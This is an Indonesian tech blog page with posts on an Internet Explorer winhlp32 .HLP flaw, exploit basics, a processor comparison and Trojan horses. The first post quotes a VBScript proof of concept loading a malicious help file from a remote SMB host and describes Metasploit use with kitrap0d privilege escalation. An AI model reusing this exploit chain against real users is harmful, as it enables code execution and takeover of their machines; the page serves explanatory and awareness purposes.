Wednesday, June 2, 2010

Bug Internet Explorer

Atikel berikut ini merupakan artikel yang diusung oleh Kecoak Elektronik yang membahas tentang adanya bug pada intenet Explorer versi 6, 7 dan 8. Kenapa saya memasukkan artikel ini? Karena saya pikir, artikel ini sangatlah penting mengingat pengguna Internet Explorer sangatlah banyak.  Berikut artikel selengkapnya...


Pada tanggal 26 February 2010, Maurycy Prodeus mengeluarkan public disclosure terhadap bug internet explorer 6, 7, dan 8 yang dapat di-eksploitasi menggunakan malicious .HLP file. Berikut ini pernyataan dari maurycy,
It is possible to invoke winhlp32.exe from Internet Explorer 8,7,6
using VBScript. Passing malicious .HLP file to winhlp32 could allow
remote attacker to run arbitrary command.
Additionally, there is a stack overflow vulnerability in winhlp32.exe
Intinya, dengan memanfaatkan VBScript maka user dapat meng-ekesekusi winhlp32.exe untuk membuka suatu file bertipe .hlp (windows help file) melalui browser internet explorer 6, 7, 8. Dan jika file .hlp tersebut sudah dimodifikasi sehingga menjadi malicious .hlp maka user dapat di-eksploitasi untuk menjalankan malicious code. Pihak microsoft untuk sementara memasukan ekstensi file .hlp kedalam kategori ‘unsafe file types’.
Untuk men-trigger vulnerability diatas cukup unik dan membutuhkan interaksi dari user untuk menekan tombol F1 ketika MessageBox muncul. Syntax untuk menampilkan MessageBox melalui VBScript sebagai berikut,



MsgBox(prompt[,buttons][,title][,helpfile,context])


Windows help file pada syntax diatas dapat diakses menggunakan samba share, berikut ini PoC dari maurycy untuk men-trigger vulnerability tersebut dan membuat user mengkases malicious .hlp file dari samba share yang telah dipersiapkannya,

'<script type="text/vbscript">
// PoC pertama
big = "\\184.73.14.110\PUBLIC\test.hlp"
MsgBox "please press F1 to save the world", ,"please save the world", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
<'/script>

PoC tersebut dapat dilihat dari sini.
Jelas terlihat bahwa malicious .hlp file yang digunakan terletak pada \\184.73.14.110\PUBLIC\test.hlp. Ketika user terpancing untuk mengeksekusi maka win32hlp.exe akan berusaha membuka test.hlp tersebut yang justru mengakibatkan eksekusi calc.exe.
Maurycy memberikan PoC tambahan bahwa terdapat bug stack-overflow pada win32hlp.exe ketika mengeksekusi parameter dengan path yang sangat panjang, namun berhubung win32hlp.exe di-compile menggunakan feature /GS maka bug tersebut tidak dapat di-eksploitasi begitu saja.
Saat ini \\184.73.14.110\PUBLIC\test.hlp tidak dapat diakses lagi, namun metasploit sudah memasukan exploit win32hlp tersebut kedalam trunk terbarunya. Ketika tulisan ini dibuat, versi trunk yang dimaksud adalah SVN r8723. Jika kalian penasaran ingin melihat malicious .hlp yang sebelumnya digunakan oleh maurycy, maka dapat melihat dari direktori metasploit di ‘data/exploits/runcalc.hlp’.
Jduck meng-integrasikan exploit tersebut kedalam metasploit framework menggunakan fasilitas WebDAV, sehingga kita tidak perlu membuat samba server untuk dapat diakses oleh target. Dengan beberapa trik yang memanfaatkan protocol WebDAV kita dapat meng-eksploitasi target dengan vulnerability diatas. Kategori eksploit ini masuk dalam ‘browser exploitaion’.
Contoh penggunaannya silahkan lihat DISINI

Sampai saat ini saya masih belum bisa menemukan letak masalah ketika metasploit digunakan dilingkungan Mac OSX, pemanfaatan feature webdav nya tidak berjalan dengan baik. Namun untuk metasploit yang berjalan diatas windows, exploit tersebut berhasil dieksekusi dengan baik seperti pada contoh diatas (anyone tried on linux?).
Exploit ini dapat digunakan pada feature ‘browser autopwn’-nya metasploit, so buat kalian para whitehat mulai dapat menikmati exploit ini untuk ditunjukan pada client saat proses pentest *heh*.
Finish?no. Sebagaimana terlihat dalam judul diatas, ada satu hal lagi yang akan kita bahas :) .
Pada 19 Januari 2010 yang lalu, tavis ormandy merilis public disclosure yang cukup (sangat?) menghebohkan, terutama bagi para pemerhati dunia security windows. Advisories yang dirilis oleh taviso dapat dilihat dari sini, inti dari advisories tersebut adalah sistem operasi microsoft windows menyimpan bug yang sifatnya 0day sejak tahun 1993. Bug tersebut di-klaim tetap ada sejak rilis Windows NT pada tanggal 27 Juli 1993 hingga implementasi Windows 7 saat ini (semua x86 32-bit windows vulnerable).
Pada saat public disclosure tersebut muncul tidak banyak pihak yang memahami ‘fungsi’-nya, contoh berikut ini ditambahkan dengan tujuan jika memang ada masyarakat indonesia yang belum mengerti (i knew, some of you are lazy to read english reference) maka dapat memahami fungsi dari exploitasi bug tersebut.
Intinya adalah kitrap0d digunakan sebagai local exploit untuk mendapatkan akses system pada windows. Jadi ketika kita berhasil meng-eksploitasi aplikasi dalam microsoft windows, namun akses yang kita dapatkan terbatas dalam arti user yang mengeksekusi adalah user biasa (non-administrator), maka dengan memanfaatkan exploit kitrap0d tersebut kita akan mendapatkan akses system yang tentu saja memberikan akses lebih tinggi.
Contoh paling mudah adalah memanfaatkan browser bug sebagai pintu masuk, seperti yang telah ditunjukan pada contoh diatas (bug win32hlp.exe), kita akan melihat informasi berikut ini:

meterpreter > getuidServer username: XPSP2\user

Hal tersebut didapatkan karena user yang dieksploitasi oleh exploit ie_win32hlp menggunakan user biasa (nama user nya ‘user’) ketika mengeksekusi exploit, dan ini biasanya dilakukan oleh ratusan bahkan ribuan pengguna komputer dalam suatu perusahaan atau organisasi dimana login kedalam windows tidak menggunakan hak akses administrator.
Metasploit mem-bundle exploit kitrap0d dengan meterpreter, sehingga kita dapat dengan mudah melakukan local exploit pada target windows untuk mendapatkan hak akses ’system’ jika paylod yang digunakan adalah meterpreter. Contohnya klik DISINI
Baca Selengkapnya...

Sunday, May 30, 2010

Exploit

Exploit atau exploitasi merupakan sebuah aksi yang memanfaatkan celah atau kelemahan pada sebuah system, bisa juga berupa bug yang terdapat pada system tersebut.
Exploit digunakan untuk menjalankan sebuah perintah yang akan memberikan akses khusus untuk melakukan tujuan tertentu yang tidak dapat dilakukan pada kondisi normal. Exploit sendiri deprogram dengan menggunakan bahasa C, perl, atau sh. Untuk mendapatkan exploit itu tidaklah susah, banyak sekali situs yang menyediakannya. Sebut saja milworm, antionline, packetstormsecurity, dll.
Exploit bisa dibedakan kedalam dua kategori,

Exploit Lokal
Exploit lokal dapat dilakukan hanya apabila seseorang memiliki hak akses untuk menggunakan sebuah sistem, atau exploit yang hanya digunakan pada kompuer itu sendiri. Contoh exploit lokal
- Buffer Overflow
- Race Conditions

Remote Exploit
Remote exploit dapat terjadi dimana seseorang bisa mengeksploitasi sistem tanpa harus mengetahui username dan password, atau exploit yang dapat dieksekusi dari jarak jauh. Biasanya remote exploit bisa jadi lokal exploit walaupun tidak sebaliknya.

Berikut ini saya berikan sebuah contoh exploit yang cukup terkenal yaitu brute_ssl. Exploit ini dibuat untuk mengilustrasikan sebuah kelemahan pada HTTP Basic Authorization. Protokol HTTP mengizinkan user untuk keluar dengan membuat banyak guest. Exploit ini akan terkoneksi dengan web server yang secure ataupun yang umum dan mencoba untuk mengalikan kombinasi username dan password sampai ditemukan yang tepat.
Untuk melakukannya diperlukan liberary SSLeay yang bisa didapatkan dari ftp://ftp.psy.ug.oz.au/pub/crypto/SSL/ ini bekerja pada SSLeay – 0.8.0 setelah di build, jalankan dengan perintah:
Cc –o brute_ssl –l/usr/local/ssl/include brute_ssl.c \
-l /usr/local/ssl/lib –lssl –lcrypto

Jalankan binary tanpa argument apapun untuk melihat parameternya.

Berikut scriptnya:




Script diatas bisa anda dapatkan Disini



Baca Selengkapnya...

Wednesday, May 20, 2009

Perang Raksaksa Produsen Prosesor

Intel Corel7 Codename Nehalem (Corel7 920, 924, / Corel7 EE 965)

Prosessor ini resmi diluncurkan bulan November 2008, sebenarnya apa saja tenologi baru yang ada pada Corel7 yang diklain "prosesor tercepat di dunia ini"?

- INTEL QPI (QuickPathInterconnect) teknologi yang menggantikan sistem FSB pada prosesor Core2Duo, sehingga Corel7 ini koneksi data antar modul memori dengan prosesor dapat berjalan lebih cepat dan dengan bandwidth lebih.
- 4 Core prosesor dengan 2thread pada masing-masing core, sehingga Corel7 ini memiliki total 8thread, dengan Vista kita akan mendapatkan 8 prosesor dalam 1 keping prosesor.
- Integrated MCH dengan 3 channels DDR3 1066MHZ.
- Fabrikasi 45 nm, cache 8Mb, TDP 130W, QPI 4.8 / 6,4GT/s, socket LGA 1366 untuk saat ini hanya ada 1 chipset yang benar-benar kompatibel dengan prosesor tercepat di INTEL ini, yaitu Intel X 58 Exp Chipset dengan ICH 10/10R pada SouthBridge nya.

AMD Phenom Generasi ke-2
- AMD 64 with Direct Connect Architecture, meningkatkan system performance dengan menghubungkan secara langsung prosesor, memori kontroler, dan input output kedalam keping prosesor.
- Balance Smart Cache, menyediakan cache yang cukup untuk semua core
- Integrated DDR2 DRAM Controller with AMD Memory Optimizer Technology
- AMD Cool n Quiet 3.0 technology
- Dual Dynamic Power Management, managemen power untuk efisiensi daya pada core prosesor dan memori kontroler
- Fabrikasi 45nm, cache 8Mb, TDP 125W, HT 3.6GT/s, Socket AM2+



Diambil dari : Fasta News 09
Baca Selengkapnya...

Berkenalan Dengan Trojan Horse

Nama Trojan Horse diambil dari mitologi Yunani pada saat perang Troya. Waktu itu pasukan yunani kesulitan untuk melumpuhkan kota troya karena troya memiliki kekuatan yang sangat tangguh. Akhirnya, sebuah strategi dijalankan. Pasukan yunani membuat seekor kuda raksasa yang terbuat dari kayu yang didalamnya diisi oleh pasukan yunani, sementara itu pasukan yunani yang lain bergerak mundur. Berkat bantuan Sinon, seorang spionase yunani, kuda kayu tersebut berhasil dibawa kedalam kota troya. Dan pada malam harinya, pasukan yang mengisi kuda kayu tersebut keluar untuk membuka pintu gerbang troya sehingga pasukan yunani yang sebelumnya berpura-pura mundur bisa masuk dan melumpuhkan kota tersebut.
Lalu apa hubungannya antara kuda troya di jaman yunani dengan trojan horse yang dianggap sebagai hewan komputer yang membahayakan?
Ada kesamaan antara strategi kuda troya di jaman yunani dengan konsep yang digunakan trojan horse, yaitu sama-sama mengirimkan media ke korbannya.
Salah satu ciri dari trojan adalah selalu mempunyai 2 bagian yaitu client dan server. Dari program client kita bisa mengendalikan program server yang ditanam di komputer korban. Alhasil, komputer korban dapat kita kendalikan dari jarak jauh (remote).
Cara kerja trojan adalah dengan menggunakan protokol TCP/IP atau adapula beberapa varian trojan yang menggunakan protokol UDP. Ketika server mulai dijalankan pada komputer korban, trojan akan menyembunyikan diri didalam sistem. Biasanya trojan akan bersembunyi pada lokasi:
1. Start-Up Directory
2. Registry -
HKLM\Software\Windows\Microsoft\CurrentVersion\Run
HKLM\Software\Windows\Microsoft\CurrentVersion\RunServices
HKLM\Software\Windows\Microsoft\CurrentVersion\RunOnce
HKLM\Software\Windows\Microsoft\CurrentVersion\RunServicesOnce
HKEY_CLASSES_ROOT\exefile\shell\open\command"%1"%*
3. Batch File
4. Initialization File
5. C:\Explorer.exe
Selain lokasi-lokasi diatas, ada kemungkinan trojan bersembunyi ditempat lain seperti yang dilakukan oleh SubSeven 2.2 yang bersembunyi di:
HKEY_LOCAL_MACHINE\Software\Microsoft\ActiveSetup\Installed Component
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer|Usershell folders

Salah satu contoh trojan yang memiliki fitur cukup mumpuni dan masih banyak digunakan hingga saat ini adalah NetBus. Beberapa fitur tersebut, diantaranya:
- fungsi keylogger
- download dan menghapus file komputer korban
- shutdown sistem
- screendump (fitur ini membutuhkan koneksi cepat)
- menonaktifkan keyboard
- mengalihkan data pada port TCP tertentu ke host atau port lain
- konfigurasi server.exe dengan pilihan port TCP dan notifikasi email
- dll

Seiring dengan perkembangan, trojanpun terus memperbaiki diri. Salah satu trojan yang telah berevolusi adalah AWRC (atelier Web Remote Commander). Trojan yang satu ini dikatakan telah berevolusi karena ia tidak lagi membutuhkan file server untuk ditanam di komputer korban, artinya trojan ini hanya memiliki satu file client dan itu cukup untuk mengendalikan komputer korban.

Beberapa hal yang bisa dilakukan untuk meminimalisir agar tidak menjadi korban trojan, antara lain:
  • Pasanglah Freezer : Freezer akan mengembalikan sistem pada keadaan semula seperti saat pertama kali freezer ini diaktifkan.
  • Update Antivirus : Sebagian besar antivirus yang beredar mampu memblokir kerja trojan.
  • Tasklist : Mendeteksi dengan cara melihat daftar program yang sedang berjalan atau anda bisa membuka msinfo32.exe (C:\Program Files\common files\microsoft shared\msinfo) untuk melihat daftar program yang sedang running tapi menyembunyikan diri dari tasklist.
  • Netstat : Perintah ini berfungsi untuk membuka koneksi ke dan dari komputer seseorang, dengan menjalankan perintah ini, akan menampilkan IP address dari komputer tersebut ke komputer lain yang terhubung.
  • TCP View: Free utility dari sysinternals, utility ini dapat menampilkan IP address dan menampilkan program yang digunakan oleh orang lain untuk melakukan koneksi dengan komputer kita.
Baca Selengkapnya...
 
:::POWER OF TECHNOLOGY::: | Template Ireng Manis © 2010 Free Template Ajah. Distribution by Dhe Template. Supported by Cash Money Today and Forex Broker Info Editing By: Diah Ika Puspa Sari